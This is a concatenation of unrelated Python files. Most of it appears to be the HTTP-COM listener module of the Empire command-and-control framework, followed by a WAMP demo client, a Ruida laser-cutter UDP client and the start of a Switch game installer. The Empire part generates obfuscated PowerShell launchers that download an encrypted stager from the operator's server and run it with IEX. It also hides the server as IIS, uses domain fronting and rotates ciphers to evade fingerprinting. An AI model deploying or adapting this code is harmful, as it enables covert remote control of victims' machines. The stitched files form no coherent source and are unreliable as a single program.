'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
stager += bypass
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + data_util.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = data_util.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = data_util.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = data_util.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "/data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "/data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
# pass
# if isinstance(results, str):
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
wamp.py
|
""" WAMP networking. """
import asyncio
from queue import Queue
from threading import Thread
from autobahn.asyncio.wamp import ApplicationRunner, ApplicationSession
from autobahn.wamp.types import PublishOptions
class WampMoles(object):
def __init__(self):
self._thread = None
self._loop = asyncio.new_event_loop()
self._loop.add_signal_handler = self._add_signal_handler
self._queue = Queue()
def __call__(self):
asyncio.set_event_loop(self._loop)
runner = ApplicationRunner(
url=u"wss://demo.crossbar.io/ws", realm=u"realm1")
runner.run(MolesComponent)
def _add_signal_handler(self, *args, **kw):
raise NotImplementedError("Don't try this in threads or Windows")
def send(self, msg):
self._queue.put(msg)
def join(self):
if self._thread is not None:
self._loop.stop()
self._thread.join()
self._thread = None
def start(self):
self._thread = Thread(target=self)
self._thread.daemon = True
self._thread.start()
class MolesComponent(ApplicationSession):
@asyncio.coroutine
def onJoin(self, details):
print("session ready")
def on_msg(msg):
print("event received: {0}", msg)
try:
yield from self.subscribe(on_msg, u'net.za.hodgestar.moles')
print("subscribed to topic")
except Exception as e:
print("could not subscribe to topic: {0}".format(e))
counter = 0
options = PublishOptions(exclude_me=False)
while True:
self.publish(
u'net.za.hodgestar.moles', "msg %d" % counter, options=options)
counter += 1
yield from asyncio.sleep(1)
|
ruida.py
|
import logging
from enum import Enum
import time
from ruida_core import get_checksum, swizzle, unswizzle, ruida_bytes_to_unsigned
from socket import socket, AF_INET, SOCK_DGRAM, timeout as SocketTimeout
from multiprocessing import Process, Lock, Value
logger = logging.getLogger(__name__)
class MSGTypes(Enum):
MSG_ACK = b'\xcc'
MSG_ERROR = b'\xcd'
MSG_PROPERTY = b'\xda'
MSG_PROPERTY_QUERY = b'\x00'
MSG_PROPERTY_SET = b'\x01'
MSG_COMMAND_THRESHOLD = b'\x80'
class CMDTypes(Enum):
RUN_TIME = b'\x04\x11'
MACHINE_STATUS = b'\x04\x00'
class RuidaCommand(Enum):
GET_RUN_TIME = MSGTypes.MSG_PROPERTY.value + MSGTypes.MSG_PROPERTY_QUERY.value + CMDTypes.RUN_TIME.value
GET_MACHINE_STATUS = MSGTypes.MSG_PROPERTY.value + MSGTypes.MSG_PROPERTY_QUERY.value + CMDTypes.MACHINE_STATUS.value
def __init__(self, value):
data = bytes([swizzle(b) for b in value])
cs = get_checksum(data)
self.bytes = cs + data
self.checksum = cs
@classmethod
def from_bytes(cls, b: bytes):
for e in cls:
if e.bytes == b:
return e
else:
raise ValueError(f"The value does not match a value in the Enum {cls.__name__}")
class RuidaCommunicator:
NETWORK_TIMEOUT = 10000
INADDR_ANY_DOTTED = '0.0.0.0' # bind to all interfaces.
SOURCE_PORT = 40200 # Receive port
DEST_PORT = 50200 # Ruida Board
MTU = 1470 # max data length per datagram (minus checksum)
def __init__(self, host, dest_port=DEST_PORT, recv_port=SOURCE_PORT):
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.bind((self.INADDR_ANY_DOTTED, recv_port))
self.sock.connect((host, dest_port))
self.sock.settimeout(self.NETWORK_TIMEOUT * 0.001)
self.host = host
def send(self, cmd: RuidaCommand):
self.sock.send(cmd.bytes)
def receive(self):
try:
resp = bytes([unswizzle(b) for b in self.sock.recv(self.MTU)])
except SocketTimeout:
logger.info("No new response received")
return
except ConnectionRefusedError:
# https://stackoverflow.com/a/2373630/4713758
# If the remote server does not have the port open, we get an ICMP response
logger.error(f"The server at {self.host}:{self.DEST_PORT} is refusing the message")
return
if len(resp) == 0:
logger.warning("Received empty packet")
return
if resp[0] == int.from_bytes(MSGTypes.MSG_ACK.value, "big"):
logger.info("Received ACK")
return
elif resp[0] == int.from_bytes(MSGTypes.MSG_ERROR.value, "big"):
logger.warning("Received error response")
return
else:
logger.info(f"Got response 0x{resp.hex()}")
return resp
def server(ruida: RuidaCommunicator, received_msg_lock):
done = False
while True:
resp = ruida.receive()
if resp == None:
continue
received_cmd = resp[0:4] #The first four bytes correspond with the command that was sent
#Check what cmd we got response for
if received_cmd[0] == int.from_bytes(MSGTypes.MSG_PROPERTY.value, "big"):
logger.info(f"Got property cmd")
#The response is for a command of the msg property type
if received_cmd[2:4] == CMDTypes.RUN_TIME.value:
logger.info(f"Got run time cmd")
runtime = ruida_bytes_to_unsigned(resp[-5:])
minutes, seconds = divmod(runtime, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
print(f"{cmd} -> {runtime} s ({days} days, {hours:2}h {minutes:2}m {seconds:2} s)")
done = True
#Are we done? If yes change the mutex and quit
if done:
logger.info(f"Done")
with msg_received.get_lock():
msg_received.value = True
break
def client(ruida: RuidaCommunicator, received_msg_lock, cmd):
while True:
logger.info(f"Send cmd")
ruida.send(cmd)
time.sleep(60)
with msg_received.get_lock():
if msg_received.value:
break
if __name__ == "__main__":
ip = "10.20.0.252"
cmd = RuidaCommand.GET_RUN_TIME
logging.basicConfig(format="%(asctime)s - %(module)-8s %(levelname)5s: %(message)s", datefmt="%Y-%m-%d %H:%M:%S", level=logging.DEBUG)
ruida = RuidaCommunicator(ip)
msg_received = Value('i', False)
server_process = Process(target = server, args = (ruida, msg_received))
server_process.start()
client_process = Process(target = client, args = (ruida, msg_received, cmd))
client_process.start()
|
fluffy.pyw
|
#! /usr/bin/env python3
"""""
"Pink Donut" design was designed by fourminute exclusively for
Fluffy and does not infringe on any copyright.
Copyright (c) 2019 fourminute (https://github.com/fourminute)
Fluffy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Fluffy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""""
# Imports
import signal
import time
import socket
import base64
import os
import sys
import threading
import struct
import random
import re
import configparser
try:
import logging
if os.path.isfile('fluffy.log'):
os.remove('fluffy.log')
LOG_FILENAME = 'fluffy.log'
logging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG)
logging.debug("Fluffy Log: If you see nothing here. Good!")
is_logging = True
except:
is_logging = False
pass
try:
from tkinter import filedialog
import tkinter as tk
root = tk.Tk()
root.withdraw()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
else:
print(str(e))
exit()
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
try:
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QThread, QByteArray
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QColor, QImage
app = QtWidgets.QApplication(sys.argv)
window = QMainWindow()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
else:
print(str(e))
exit()
try:
import usb.core
import usb.util
usb_success = True
except:
usb_success = False
pass
# Variables
VERSION = "2.7.1"
GREEN = "QLabel {color: #09A603;}"
BLUE = "QLabel {color: #00A2FF;}"
RED = "QLabel {color: #cc2249;}"
PURPLE = "QLabel {color: #7F0CE8;}"
CMD_ID_EXIT = 0
CMD_ID_FILE_RANGE = 1
CMD_TYPE_RESPONSE = 1
iconpixmap = QPixmap()
inlaypixmap = QPixmap()
dinlaypixmap = QPixmap()
transfer_rate = 0
is_installing = False
last_error = "NA"
is_done = False
is_network = False
is_goldleaf = False
is_exiting = False
selected_dir = None
selected_files = None
sent_header = False
cur_nca_name = "NA"
start_time = time.time()
cur_transfer_rate = 0
last_transfer_rate = 0
cur_progress = 0
end_progress = 0
cur_nsp_count = 1
total_nsp = 0
cur_nsp_name = "NA"
max_nca_count = 0
cur_nca_count = 1
initial_dir = os.getcwd()
switch_ip = "0.0.0.0"
host_ip = "0.0.0.0"
language = 0
# Load Settings
if os.path.isfile(initial_dir + '/fluffy.conf'):
try:
with open(initial_dir + '/fluffy.conf') as cfgfile:
configp = configparser.ConfigParser()
configp.read_file(cfgfile)
switch_ip = configp.get('DEFAULT', 'switch_ip')
dark_mode = int(configp.get('DEFAULT', 'dark_mode'))
language = int(configp.get('DEFAULT', 'language'))
except:
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
pass
else:
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
gold_in = None
gold_out = None
net_port = 2000 #Unused, saved for future reference (Ie. Goldleaf Network)
